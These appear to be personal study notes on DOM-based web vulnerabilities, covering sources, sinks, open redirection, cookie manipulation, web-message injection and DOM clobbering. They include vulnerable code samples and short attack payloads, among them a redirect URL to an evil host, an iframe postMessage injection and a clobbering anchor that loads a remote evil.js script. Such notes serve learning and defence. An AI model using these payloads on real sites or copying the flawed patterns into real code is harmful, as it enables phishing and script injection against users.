notes

What is DOM?

Document Object Model - web browser's hierarchical representation of the elements on the page
Websites can use JS to manipulate the nodes and objects of the DOM, as well as their properties
DOM based vulnerabilities arise when a website contains JS that takes an attacker-controllable value known as a source, and passes it into a dangerous function known as a sink

Source

a JS property that accepts data that is potentially attacker-controlled
eg - location.search property as it reads the input from the query string which is relatively simple for an attacker to control
any property that can be controlled by the attacker is a potential source
this includes the referring URL (exposed by the document.referrer string), the user's cookies (exposed by the document.cookie string) , and web messages

Sinks

potentially dangerous JS function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it
eg - eval() function as it processes the argument that is passed to it as JS
example of HTML sink is document.body.innerHTML as it potentially allows the attacker to inject malicious HTML and execute arbitary JS
Fundamentally, DOM-based vulnerabilities arise when a website passes data from a source to a sink, which then handles the data in an unsafe way in the context of the client's session
eg -

var goto = location.hash.slice(1);
if (goto.startsWith("https:")) {
  location = goto;
}

this leads to DOM-based open redirection as the location.hash source is handled in an unsafe way
if the URL contains a hash fragment that starts with https:, this code extracts the value of the location.hash property and sets it as the location property of the window
attacker can exploit this vulnerability by constructing the following URL:

https://www.innocent-webiste.com/example#https://www.evil-website.com

When a victim visits this URL, the JS sets the value of the location property to https://www.evil-website.com, which automatically redirects the victim to the malicious site

Common sources

document.URL;
document.documentURI;
document.URLUnencoded;
document.baseURI;
location;
document.cookie;
document.referrer;
window.name;
history.pushState;
history.replaceState;
localStorage;
sessionStorage;
IndexedDB;
Database;

Common Sinks

DOM-based vulnerability

Example sink

DOM XSS

document.write()

Open redirection

window.location

Cookie manipulation

document.cookie

JS injection

eval()

Document-domain manipulation

document.domain

WebSocket-URL poisoning

WebSocket()

Link manipulation

element.src

Web message manipulation

postMessage()

Ajax request-header manipulation

setRequestHeader()

Local file-path manipulation

FileReader.readAsText()

Client-side SQL injection

ExecuteSql()

HTML5-storage manipulation

sessionStorage.setItem()

Client-side XPath injection

document.evaluate()

Client-side JSON injection

JSON.parse()

DOM-data manipulation

element.setAttribute()

Denial of service

RegExp()

DOM-based Open redirection

arise when a script writes attacker-controlled data into a sink that can trigger cross-domain navigation
eg - vulnerable due to the unsafe way it handles the location.hash property

let url = /https:?:\/\/.+/.exec(location.hash);
if (url) {
  location = url[0];
}

attacker may be able to use this vulnerability to contruct a URL that if visited by another user, will cause a redirection to an arbitary external domain

Impact

phishing attacks against users of the website
Sinks that lead to DOM-based Open Redirection

location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
element.srcdoc
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.ajax()
$.ajax()

arises when a script writes attacker-controllable data into the value of a cookie
attacker has to construct a URL that if visited by another user, will set an arbitary value in the user's cookie
eg - JS writes data from a source into document.cookie without sanitizing it first, an attacker can manipulate the value of a single cookie to inject arbitary values

document.cookie = "cookieName=" + location.hash.slice(1);

document.cookie sink can lead to DOM-based cookie-manipulation vulnerabilities

Controlling Web Message source

consider the following code:

<script>
  window.addEventListener("message", function (e) {
    eval(e.data);
  });
</script>

This is vulnerable because an attacker could inject a JS payload by constructing the following iframe:

<iframe
  src="//vulnerable-website"
  onload="this.contentWindow.postMessage('<img src=1 onerror=print()>', '*')"
></iframe>

DOM clobbering

technique in which you inject HTML into a page to manipulate the DOM and ultimately change the behavior of JS on the page
useful in cases where XSS is not possible but can control some HTML on a page where the attributes id or name are whitelisted
eg - you can use DOM objects to overwrite other JS objects and exploit unsafe names, such as submit to interfere with a form's actual submit() function

<script>
  window.onload = function () {
    let someObject = window.someObject || {};
    let script = document.createElement("script");
    script.src = someObject.url;
    document.body.appendChild(script);
  };
</script>

To exploit the vulnerable code ,

<a id="someObject"
  ><a id=someObject name=url href=//malicious-website.com/evil.js></a
>

PreviousDOM-based Vulnerabilities Nextlabs

Last updated 3 years ago